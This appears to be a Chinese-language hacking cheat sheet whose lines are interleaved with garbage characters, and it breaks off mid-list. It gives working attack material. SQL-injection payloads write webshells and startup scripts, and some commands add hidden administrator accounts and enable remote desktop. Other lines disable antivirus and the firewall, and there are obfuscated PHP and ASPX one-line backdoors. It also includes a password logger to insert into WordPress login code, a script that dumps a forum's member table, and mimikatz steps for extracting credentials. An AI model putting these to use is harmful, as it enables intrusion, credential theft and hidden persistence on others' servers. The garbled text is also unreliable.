+ e& l) w8 v& S1 f2 ouse test;! [/ N7 W/ W$ B( I* y7 t4 H+ K+ R
create table a (cmd text);% K+ ^7 w4 f+ L* t# j/ {. t H9 p2 j$ `
insert into a values ("set wshshell=createobject (""wscript.shell"") " );2 R( ?' V: n8 j6 {
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
( L- r0 R" R4 p; _ E2 Ainsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
( |6 s- T; k1 v+ q8 bselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
7 D+ o: Q l) I* zdrop table a;) h) h' b% l, b/ ]
& G* D- g$ e2 ~6 R
英文版本:! X% _; R, d3 \, e1 @3 L! S* W9 K( w
) l1 x( U% F$ G1 u- Q! Y2 e% }
use test;
( ?* z* X& ]/ ~: u" ucreate table a (cmd text);! r4 E' a4 a: }. g& I
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
8 V; ]& B3 C! C4 I3 Finsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
, k7 M, }: t0 ~1 Kinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
# F1 d! g; C" Y$ f$ Kselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";& n1 p1 H; M9 a' c+ J
drop table a;- c, R$ b, v: E) d' H; @8 z+ w
# |. E% v3 i+ `' q& vcreate table a (cmd BLOB);
$ S( J5 l" @* R$ T) b4 Iinsert into a values (CONVERT(木马的16进制代码,CHAR));
5 S: [1 \3 N e' e$ y& sselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
, O+ ]$ q1 W$ E% ^3 mdrop table a;6 T0 b! ^) L1 C: [; }; [+ G+ V
* r }* B& t: I X记录一下怎么处理变态诺顿! x* ~$ I* U" H# @2 g0 U3 D
查看诺顿服务的路径
0 Q* Z8 L! @( asc qc ccSetMgr; s7 Q7 m9 u3 ~+ m% F
然后设置权限拒绝访问。做绝一点。。
0 p& F& p; {, ~6 Xcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system! G; b' Z- @5 q# v9 r. i% E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
P5 [ m5 g: |, w/ @; `3 l, O% Fcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
4 C5 o% \/ s' l; A! Acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
7 i- g* {0 w6 e$ `2 |; \0 Z, ^
. P; f7 j% x8 |8 y+ n然后再重启服务器% N# j- w" U' L6 N, H
iisreset /reboot
: Z5 }, T& z) {# B这样就搞定了。。不过完事后。记得恢复权限。。。。
4 J4 j4 j( G3 [+ B* acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
( d0 d$ m9 V ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
+ _# D: K- y: P! }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
+ t6 e9 [% u" ]: f$ Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
- g8 |; G9 g0 w" v2 WSELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 t3 c8 ~0 ]$ ~
8 F2 [8 D9 u7 {
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user'''), P- L x7 O9 ?& E) e' o$ o
) d5 ]5 k# w6 I: X0 {( Apostgresql注射的一些东西/ I- n6 u2 F( h7 f: R g9 p; H
如何获得webshell
4 p0 \- n2 A% ]" n7 whttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
1 _! c: {; a" rhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
' k1 v- U7 Z" q* qhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
4 R# V. P# d0 D& X/ j8 \如何读文件1 Q& o8 {- o% B3 g9 |0 S: G
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
. F/ x& Y* ~% f& U- O, Dhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;, t( Q2 C) \/ M6 N% j" i) b2 O
http://127.0.0.1/postgresql.php?id=1;select * from myfile;. ^, [* t6 k6 ~0 G
6 X) |3 D" B$ k+ M" M# P( x7 I
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。) X/ T1 d2 p! ]2 A& F
当然,这些的postgresql的数据库版本必须大于8.X
* L6 R8 g7 t2 H& p创建一个system的函数:
. g( Q1 l0 ^( r$ pCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; n0 z$ L. x8 |; ^, B. y: p
# }" S3 m- u7 g s2 ?9 z创建一个输出表:
. |( ]. ^2 c5 {. M9 p) @! W$ ACREATE TABLE stdout(id serial, system_out text)
( i) [2 s& ?( L$ R" h: I; _% j( R: Q
执行shell,输出到输出表内:% W% C% ?% T1 o5 G
SELECT system('uname -a > /tmp/test')
* R5 O/ m5 G/ Y" i, n# i( p* k2 w
( O, `' i5 k8 f" K% o4 scopy 输出的内容到表里面;- B/ }: q2 S" P/ Q# M ? Z \! s
COPY stdout(system_out) FROM '/tmp/test'7 e, q; `, O+ U) _4 Z8 T/ f+ H
7 d$ ]6 e9 W W& `1 p5 J ~' S
从输出表内读取执行后的回显,判断是否执行成功* f3 Q6 _, z$ K7 a
4 D8 B5 o# k( r3 ISELECT system_out FROM stdout
# t1 L& t% ?/ s$ i下面是测试例子
8 L: v. F D& P1 c4 W
$ h4 ^& Y. F( _0 o/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- , x/ {, R/ O" d
) ? y' ?( X8 T% O3 L7 o& E& I/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'1 n7 T# b0 w# M5 J1 r( A
STRICT -- m% m% y+ K7 k0 z
1 c$ a m0 C' p, ?
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
4 T$ s6 A9 |2 z; q* n k
0 v ^) F/ u$ \7 v- [/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --' n) {( n/ a! ~" a% a/ ] i7 Y9 A
6 s) e1 v, y9 _4 F5 \( h ~" k
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
" U, W" A4 H1 J1 c8 e3 k, [net stop sharedaccess stop the default firewall, H/ Y, i* e% A# L% k9 B9 {
netsh firewall show show/config default firewall8 K9 N. R }7 i* n( [
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
; {6 B$ Z) ]/ R2 R: a- k: hnetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall6 \6 w, g, G7 i# T- k
修改3389端口方法(修改后不易被扫出)5 F; o, m& x; d1 }7 Q+ k$ j$ J
修改服务器端的端口设置,注册表有2个地方需要修改
: b1 M9 ]) y3 Z& W' i% |% e) B
4 K5 u6 h, y9 ]& J6 Q( c[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]* ^8 V% j4 I; \
PortNumber值,默认是3389,修改成所希望的端口,比如6000
0 [6 M5 i3 h* ^$ O; p, @( M. @- D9 S+ R2 ]
第二个地方:6 |) d# v1 L4 C* h8 B# K
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ! e O7 h0 b5 H2 y+ s
PortNumber值,默认是3389,修改成所希望的端口,比如6000
8 Y. |) h. V' S/ m% |6 U
5 {/ e2 e' P J现在这样就可以了。重启系统就可以了. h' V0 o" K# m2 S+ T( F0 {
, i) @: b" e' e$ k查看3389远程登录的脚本
3 f9 s; {' y8 v保存为一个bat文件" ~& w( C {& a& x1 D1 M
date /t >>D:\sec\TSlog\ts.log
; d" C9 Q ]' I; Z$ Ctime /t >>D:\sec\TSlog\ts.log, X4 i0 @8 U M5 w
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
0 A2 p' A* F j. `* Zstart Explorer5 C( N- R" e5 a" p# o! R
5 P& q2 T: j" e9 ~
mstsc的参数:: I7 J; f8 ~4 g7 W8 F0 U o7 O/ @% A' E
! Z8 f! c2 e+ K7 a/ m) F) V* N远程桌面连接$ \) I9 }7 `2 C2 i) f" ~% O
# N" q0 T( J+ YMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]0 s5 V: A) J! C. o2 c9 k6 f
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?9 R1 r' A$ C1 t" S4 |* A
5 Z, ^, K6 y& e& ^0 E. {
<Connection File> -- 指定连接的 .rdp 文件的名称。
& R6 i9 t' `5 G, j3 w
! l8 U9 H. J6 } D, P/v:<server[:port]> -- 指定要连接到的终端服务器。
- O) Z6 A" m( d. ?8 v, F+ Z, G$ z$ r4 t% Z7 C$ Z1 z
/console -- 连接到服务器的控制台会话。
+ h, e* J1 y; G; b$ _8 v6 Q! N+ I4 p% F
/f -- 以全屏模式启动客户端。
! k3 Q8 T& v9 h4 K; H) M- U2 j' e; K4 e( d+ h2 {: e
/w:<width> -- 指定远程桌面屏幕的宽度。% @3 j5 M5 Z. D) f( |7 o8 i. |
: v$ e9 }; h9 e. A( }( E
/h:<height> -- 指定远程桌面屏幕的高度。
0 ]0 A2 e3 H* C% O. ~1 ~+ J3 c9 } w, K. {
/edit -- 打开指定的 .rdp 文件来编辑。% x# H$ X* f1 W# C' n
3 R1 e$ K% Q: W5 `6 b$ w2 c
/migrate -- 将客户端连接管理器创建的旧版
X/ h* p3 _6 ] U' n0 `: P连接文件迁移到新的 .rdp 连接文件。
' `+ _6 M3 `/ D3 g8 |
T# J1 Q# K( N6 o$ t! [" Q2 a
. A. z( I$ o8 o8 X' C2 F: q其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就/ b. u1 d5 ?* b: O6 {8 l6 ]; n
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量! I$ @8 C' `) M, {
' W- N3 s. ~. r( q( T命令行下开启3389
M* l8 n. K; E- N+ @' Znet user asp.net aspnet /add
* |) K9 {' s9 O3 wnet localgroup Administrators asp.net /add W6 P# f& ?& {- q8 } K5 D9 b( h
net localgroup "Remote Desktop Users" asp.net /add
% O7 v! r0 i9 Sattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
/ v& [; `$ O' Mecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
7 K' J0 B {" U, M. H* @echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1; I$ i8 Z; [9 p2 u
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
3 v) l$ r5 L* K. a) w% ~9 k! a3 Qsc config rasman start= auto; k- y/ w# E8 s) m% p4 [3 q
sc config remoteaccess start= auto
4 P b( e0 i# V! fnet start rasman
- m; U" L' ` c$ S- X) C3 b# _4 E5 lnet start remoteaccess
( v* A8 b3 G3 R- u9 k7 ]( kMedia
6 k8 e3 P# D% S2 \<form id="frmUpload" enctype="multipart/form-data"6 k/ [, R6 U$ k4 B1 m- }
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>! C# l$ n1 |& Q: E1 E9 _9 L: O
<input type="file" name="NewFile" size="50"><br>% E! X8 {2 P$ J
<input id="btnUpload" type="submit" value="Upload"> ~/ z, G) }1 J, b5 f
</form>
* Y9 o) `. I2 W1 q9 `6 f% x9 J+ g% q/ n$ X: X& x6 {- ^
control userpasswords2 查看用户的密码1 W/ B* q% e( p% }7 s6 k% P8 B
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
2 R! H# p. z; I3 q bSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
( u! q. W0 n- W
. \ o/ N V& v" X9 K) M141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
$ j2 F; G3 w' s测试1:
9 @& }4 k- A/ a" O3 m; V h wSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t18 L i, D* }: M4 `
6 @2 i) C8 p; V8 D测试2:! |/ Z/ a9 o: D5 S
7 ~( U. i+ ^; {3 s0 T/ k8 R5 bcreate table dirs(paths varchar(100),paths1 varchar(100), id int)+ x/ c9 H d* h- [
, k) N% c$ G& m/ [4 ^8 O) }; Mdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
- i" x8 x3 r! [$ D# U7 y
( T; \& ^1 c% r6 \6 p, \, kSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
* B* o$ s' m! i2 U" U" j3 E关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
1 u; T' {1 Y. U( R9 I可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;, T; k) x K0 u4 M7 @# i3 }3 ^
net stop mcafeeframework
3 {, l f* K8 \! n- I/ Enet stop mcshield
& S/ Z- I! D' O& vnet stop mcafeeengineservice
: ^7 b, r1 S# \5 Y \- r ^5 ~. Fnet stop mctaskmanager
1 ?- T8 x& A3 w. c/ Mhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
9 R5 H+ P- X' {- b* ?& d6 @; e! n6 v. a) D
VNCDump.zip (4.76 KB, 下载次数: 1)
) x7 X2 g) o3 A密码在线破解http://tools88.com/safe/vnc.php8 ]+ N: f+ K, S8 H( E+ b
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取- B( l' [! w6 c. z
! D3 s. _' l4 W; j+ V0 ^3 Iexec master..xp_cmdshell 'net user'/ L8 a- a0 V1 t% [1 d" _7 K
mssql执行命令。9 {% f F7 X/ B2 M# B
获取mssql的密码hash查询
' {2 F N, x J, gselect name,password from master.dbo.sysxlogins( E# x, f3 m/ |9 e0 P& m
& P7 t; V8 T' j9 ^3 S
backup log dbName with NO_LOG;
0 w8 d' R8 ]7 g3 @backup log dbName with TRUNCATE_ONLY;
/ l- X+ ~6 g& w0 i2 a* `, S3 UDBCC SHRINKDATABASE(dbName); k# a! R y4 Y/ V/ L( o
mssql数据库压缩
: m" c X9 x, [3 |& Y$ u/ L: F5 j
6 W e* c: U1 w3 H2 e& C+ mRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
- [# g- s) X3 Z. j) i- o将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
: A& |7 g% O3 i
6 ^6 i: B0 q' q9 H3 O: sbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'5 h" f; n" w9 p+ ^5 h3 t; y
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak7 a# |) y @% O7 B, E5 q3 G
5 ^ F6 N9 G) P; C. A. iDiscuz!nt35渗透要点:8 z9 }7 `' `1 C
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
( |* E3 M3 E9 ~(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>- G& B( N( `% t; z
(3)保存。8 r: D6 j: V( n; }- D& `. D& c, H: v
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass0 k. j* i6 o- A8 s% k
d:\rar.exe a -r d:\1.rar d:\website\
; G1 k5 |8 ~7 N, V! f7 j( E递归压缩website
' U6 q& Q/ _6 q! ?+ g( e& B注意rar.exe的路径
7 Z3 m8 v) y, T$ o3 Y, p2 B: F: ?+ W1 V5 A
<?php3 G( h8 z, g$ d6 N8 \" @$ ]4 b! x
% `" U5 \* `2 d
$telok = "0${@eval($_POST[xxoo])}";
& o* @/ @3 w' |# L% \( i* s7 f- q! E# d) s n A8 F/ W% q
$username = "123456";
' } p. {2 u8 w% O2 d& {
3 H* g! V1 ^0 C5 c( g$userpwd = "123456";& p- E+ C4 T2 q2 h- o8 R, U
7 i7 d1 z! G# b2 s$telhao = "123456";$ b" c! s+ n' L* {) |
' ]) s* \6 w% z& U6 F! v& `* K/ K$telinfo = "123456";
% S( f' {# K0 p5 p. w0 w, Q5 U E0 q( H1 p6 f
?>' m; v& r( ? \. A1 `3 s/ k- N) B! A
php一句话未过滤插入一句话木马
0 V$ ~7 x5 H2 Q; W" B2 ~( i$ f2 ~2 j, q' M2 e
站库分离脱裤技巧. {* x6 d; I& V$ M
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"', |' d1 q2 l9 G# W- d
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
: t: W5 L y' D3 V& U% |条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。& `4 U$ t6 U0 h! {. z+ h
这儿利用的是马儿的专家模式(自己写代码)。; n& u4 P ?* Q' B9 H
ini_set('display_errors', 1);
# a7 F% A! K( o% g5 k2 N2 pset_time_limit(0);
$ s/ [: P% Y/ i. g5 B) h6 b% Aerror_reporting(E_ALL);! F, x! A0 K u# _* L5 k8 K z2 q0 m
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());! {6 \1 j5 f1 {( [, M7 J( I w
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());3 A' J7 @; I+ g% L
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
" \; |) I, r f' t! }! s$i = 0;
- {. U# v3 u$ Q1 z( f0 \$tmp = '';9 q$ G' }; `& b; S1 O7 J! a
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {% M9 z' s# N6 K4 G. T( S# D
$i = $i+1;
% t8 \, s9 U# D9 r6 G$ D $tmp .= implode("::", $row)."\n";: Q: G+ i+ I! D$ \" ~9 G
if(!($i%500)){//500条写入一个文件% ?3 e' X0 K8 r
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';+ l' u S" p3 d) y
file_put_contents($filename,$tmp);, o$ |, G/ X! i; h. I* J
$tmp = '';" @' C" x8 F. L3 }+ i
}
- I- e4 m, f; m% P}
. n5 [" k6 f/ q9 M) r: W& \) [mysql_free_result($result);$ ?2 ~8 E! G# s( t2 z. f* R
; h8 |- y# i: V
. c# E- F; {+ g- T. l G! k- Q, q& ]' O! i6 y& K: ?# P: d
//down完后delete
' K# K" _ a2 p. \$ n
4 G6 V& P) }- v8 X. O
1 H* g& ?+ u1 z s# iini_set('display_errors', 1);6 G; ]; r% k5 S: H \! l. ?$ k) V
error_reporting(E_ALL);/ t4 ?" v* w; ?( R: u
$i = 0;
$ U, I5 { r( @) B1 cwhile($i<32) {
/ Y* S. }& z1 Q1 }0 h: f0 W1 W5 i $i = $i+1;8 [( g. ?9 |+ G, ]/ V6 }6 j7 N
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';" n, l# T1 I7 d8 M. U$ b
unlink($filename);3 R" [" G1 F( ^. J$ D% @" W
} ! n( d9 y: [* ^; n8 n# x1 N. _
httprint 收集操作系统指纹
6 f! e7 w9 o" B2 F扫描192.168.1.100的所有端口4 ] K, x* ]& t: ?, i+ a
nmap –PN –sT –sV –p0-65535 192.168.1.100
8 i! d8 ^" I5 Qhost -t ns www.owasp.org 识别的名称服务器,获取dns信息3 }- F; u: p9 E4 I6 f2 L6 P
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输: ?4 `( ?$ V9 `
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host) \: L% j( x# a" ?; Q
# A- `, i9 |1 c; I+ o0 UDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册), L; q$ A3 N9 D' Q
2 A' w, w+ y* F- a7 ]: L' `
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)( d' ~ v* o) q( d
: S/ O4 y5 c3 {/ E! `: u4 S Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x p# k+ x+ L/ O" \3 Y: z) t' _
( a w! R& m$ j3 h DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
# `4 N0 S) i( C( ?, D: Y2 N$ R8 |/ T
http://net-square.com/msnpawn/index.shtml (要求安装)
/ C" s: D. s4 x) e9 C; Y7 A, f9 D4 l+ T* a. x
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)1 f+ `' W" y3 u5 f: F
! e& y& o; A2 T. m6 Z9 s" z' }# h SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找): a) E" {8 [+ Z" C* W) o1 o
set names gb2312
( V5 S6 S; s5 K, E导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。- }+ b5 p% q% o9 S1 J) Z$ Y* T
. R2 A/ {0 s/ A3 O( b: Y
mysql 密码修改. M' R% `/ w0 [. }# ?9 [
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 2 l8 h; B {4 [. \9 ?
update user set password=PASSWORD('antian365.com') where user='root';2 }- g" ]; r1 Q( ~
flush privileges;9 {9 }. x4 a& w k
高级的PHP一句话木马后门9 B t0 |# C" Z4 U. |% G" K
( g' T6 e( Y& C/ a; k4 W$ M
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
# _7 [5 H: K0 @# P. ~& Z+ q; ]+ s e
1、) T! a" t/ T, {( D6 [0 U
" Z" X2 F* L& O( }7 h
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! g0 ]+ j* Y$ J
: L2 L/ j' O3 u% x! {' ?
$hh("/[discuz]/e",$_POST['h'],"Access");' c1 G( t0 r" }- X$ A. ^$ {% a
6 c2 ~) a& x' ^) c( c
//菜刀一句话
. |5 \- |# x p8 U* P7 L7 a4 K
. j2 l9 V/ b7 X3 d2、
( J- e% I1 p* w. x3 ~* u: L7 B" a/ m0 f; k% Y7 S3 q+ F4 t
$filename=$_GET['xbid'];! i6 O1 ~" n {7 s
) Q! s; d ]" ?+ _- U8 W+ h( `
include ($filename);
% a# T$ L% R2 H
3 v# a1 h; S. M# J: Z//危险的include函数,直接编译任何文件为php格式运行' R! @* H- n# K( G% \5 `( w- w7 i
0 m$ w: S% ^; m7 _8 f9 \! C
3、( h. i8 X9 Y; z- _7 L
O" s/ i6 y! W7 c. C' {$reg="c"."o"."p"."y";$ ^$ W$ ]- d2 ~2 b( I6 U- L) l
( y( T, G6 M# }8 k; j+ p; p
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
! _7 e: O9 b1 H* d+ S7 H v i- ^- {# {5 F7 q
//重命名任何文件" n, ]6 r x8 ^2 V
: Q& {9 k( h }$ c
4、
/ ^8 D0 K3 f4 m$ r. B% [' K
1 W$ l9 t5 y% W1 `+ ]* m$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 s" @ R7 U3 e. V7 {8 q
, D! {% n% K) ~6 D* l$gzid("/[discuz]/e",$_POST['h'],"Access");! m6 |" A) h( D9 `: ^4 g# R
) \0 h( K9 h% n2 b
//菜刀一句话
) |1 ~% S" h! j% @% s: p! t; g- F
5、include ($uid);
0 m% H' ]0 v9 J: S2 j
( z, b1 ~6 r8 U7 W: [//危险的include函数,直接编译任何文件为php格式运行,POST 0 k D/ w0 Y k8 u/ H" R
% O/ M$ z1 U; C. D# P2 {1 A2 y
7 I: ?. H+ K1 q' b$ t+ h& ~. G# ?//gif插一句话
" V9 i( K( k4 n0 _6 d$ W! d. ]% T5 _4 I# v5 S' Z- r
6、典型一句话' S0 S% J" `0 N
7 d2 \& E$ A# m& U O, y/ k
程序后门代码
$ q) m2 h# A4 Q A/ ?3 Y" T7 f<?php eval_r($_POST[sb])?>0 h+ N( c! e) ]" Q" E" N
程序代码; [3 T' F# J1 g/ C7 S5 T4 b7 q
<?php @eval_r($_POST[sb])?>
' T9 e% P+ y! e9 C( S- |//容错代码
4 M& U4 Q$ }0 U& o程序代码
% L) l1 l+ C3 F4 n7 L<?php assert($_POST[sb]);?>
, b4 ^6 h/ X3 c. X. [//使用lanker一句话客户端的专家模式执行相关的php语句6 o5 |) P2 G+ d; @* D
程序代码( T8 x$ |; R2 N& ]$ u0 Y
<?$_POST['sa']($_POST['sb']);?>
: X! V$ r* t f5 K) j9 X9 w Q程序代码
# i5 j1 c5 i$ \; L- L9 u" n8 u<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>$ h4 w! p- S% y
程序代码3 f* {: {( k+ G& a- F
<?php/ I- {; |% l) }; I
@preg_replace("/[email]/e",$_POST['h'],"error");
$ L8 c/ r7 R( X5 j ?& T/ w; I?>
0 N/ m( u, K+ M: W# K//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入/ G6 ^" v! ? B% E' I& Y6 B8 j
程序代码/ |# I' I& i+ s o
<O>h=@eval_r($_POST[c]);</O>- I. S' H/ B# a6 \% l0 S: E2 b+ U
程序代码+ e5 r2 @8 l, A% V* V
<script language="php">@eval_r($_POST[sb])</script>2 q- B; R* k4 x0 Y4 b
//绕过<?限制的一句话
$ h. I, N% H+ F$ o9 H6 {$ R# h/ m8 e5 y9 i+ X
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
# e% |% S k2 S6 d: i1 R! e/ D9 | E详细用法:
: R5 l& h3 V: ]1、到tools目录。psexec \\127.0.0.1 cmd2 d6 c) d& U* k
2、执行mimikatz3 V: @' a' t: R
3、执行 privilege::debug
X- b. }0 a" b5 {# D4、执行 inject::process lsass.exe sekurlsa.dll8 m8 W4 J" c n1 _' D- N- p3 R
5、执行@getLogonPasswords
' b* k* o% t9 E' {6、widget就是密码/ F' D% E Y' k' b* L, B# D
7、exit退出,不要直接关闭否则系统会崩溃。# Y t# w1 d/ l8 T4 T
$ h5 Y* p% z; ?6 x" |http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
, O$ w% [! X) ?% ^, A5 j1 u; C; a& l0 I& s$ z, ] L
自动查找系统高危补丁' y Y9 z5 `0 n0 {+ g; h
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt! W' \; V* i7 n
3 D% J Q, ?2 X
突破安全狗的一句话aspx后门: U+ E% r. @" M( E4 g$ u0 N
<%@ Page Language="C#" ValidateRequest="false" %>4 Y0 h: E" V: l$ E: I5 I
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
* e- T9 ?& T# gwebshell下记录WordPress登陆密码, _1 t p( c8 P4 Y" _
webshell下记录Wordpress登陆密码方便进一步社工
+ V( f6 N: m: U- W* z4 y+ Z4 m( \在文件wp-login.php中539行处添加:. j5 \) ]/ a! M5 N7 K' x y
// log password5 E% k) x6 s7 i1 L3 D3 J
$log_user=$_POST['log'];
/ S$ A/ D2 O! z8 p% q3 c& k9 Q$log_pwd=$_POST['pwd'];
8 v- f- o j# J* N3 G3 N$log_ip=$_SERVER["REMOTE_ADDR"];
' B8 l; ^5 w( g3 q; H$ ]7 X$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
* [ X4 p3 z; I: W! X; J5 f# _5 U; K$txt=$txt.”\r\n”;
s0 {, R- O0 u6 ]/ C2 j) {! a7 _6 Oif($log_user&&$log_pwd&&$log_ip){. f0 [2 z2 b0 i
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
% k0 b- [& ?# [0 S+ \ G}
* `$ |: P* U/ O; v1 f当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。% o# D( g# z) s/ g
就是搜索case ‘login’8 N* K! X3 v, g/ t
在它下面直接插入即可,记录的密码生成在pwd.txt中," c) S; o6 s g3 K
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
% W9 G" \) _( C( P. c- P( o利用II6文件解析漏洞绕过安全狗代码:
* b0 q& s- K. E' D. i: \;antian365.asp;antian365.jpg2 E1 U7 Y7 b/ P+ g) b7 W
" p! K8 B0 Q- Q7 q1 W各种类型数据库抓HASH破解最高权限密码!4 D3 f/ Q1 x4 F; q2 D- ]3 |
1.sql server2000
